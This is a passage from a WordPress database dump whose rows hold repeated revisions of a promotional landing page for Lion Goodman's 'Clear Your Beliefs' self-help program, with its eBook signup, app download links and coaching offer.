I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 00:09:50', '2014-11-20 05:09:50', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1811, 2, '2014-11-19 23:18:23', '2014-11-20 04:18:23', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook</p> <img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p" style="text-align: center;padding-top: 30px !important;margin: 0px"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p> </p>Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1">\n<strong>DOWNLOAD the FREE APP</strong>\n</p>\n<p class="tri-panel-p tri-panel-2nd-p-2">\nStart Clearing Whatever Is In The Way Right Now!\n</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 23:18:23', '2014-11-20 04:18:23', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1810, 2, '2014-11-19 23:18:14', '2014-11-20 04:18:14', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook</p> <img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p>  </p><p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p> </p><p>  </p>Complete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman<p>\n\n<h1 class="su-post-title">307601254</h1>\nPosted: November 19, 2014 | <a href="http://clearyourbeliefs.com/?attachment_id=1798#comments" class="su-post-comments-link">0 comments</a>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4">http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4</a>\n\n</p>', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 23:18:14', '2014-11-20 04:18:14', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1814, 2, '2014-11-19 23:25:04', '2014-11-20 04:25:04', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p">\n<strong>Download the free eBook.</strong>\n</p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1">\n<strong>DOWNLOAD the FREE APP</strong>\n</p>\n<p class="tri-panel-p tri-panel-2nd-p-2">\nStart Clearing Whatever Is In The Way Right Now!\n</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px">\n<strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong>\n</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 23:25:04', '2014-11-20 04:25:04', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1813, 2, '2014-11-19 23:23:13', '2014-11-20 04:23:13', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p">\n<strong>Download the free eBook.</strong>\n</p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1">\n<strong>DOWNLOAD the FREE APP</strong>\n</p>\n<p class="tri-panel-p tri-panel-2nd-p-2">\nStart Clearing Whatever Is In The Way Right Now!\n</p>\n\n[/su_box]\n-------------------------------------------------------------------------------------------------------------------\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px">\n<strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong>\n</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 23:23:13', '2014-11-20 04:23:13', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1812, 2, '2014-11-19 23:20:50', '2014-11-20 04:20:50', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook</p> <img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p>  </p><p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p> </p><p>  </p>Complete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 23:20:50', '2014-11-20 04:20:50', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1816, 2, '2014-11-19 23:41:34', '2014-11-20 04:41:34', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	 Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong>\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> 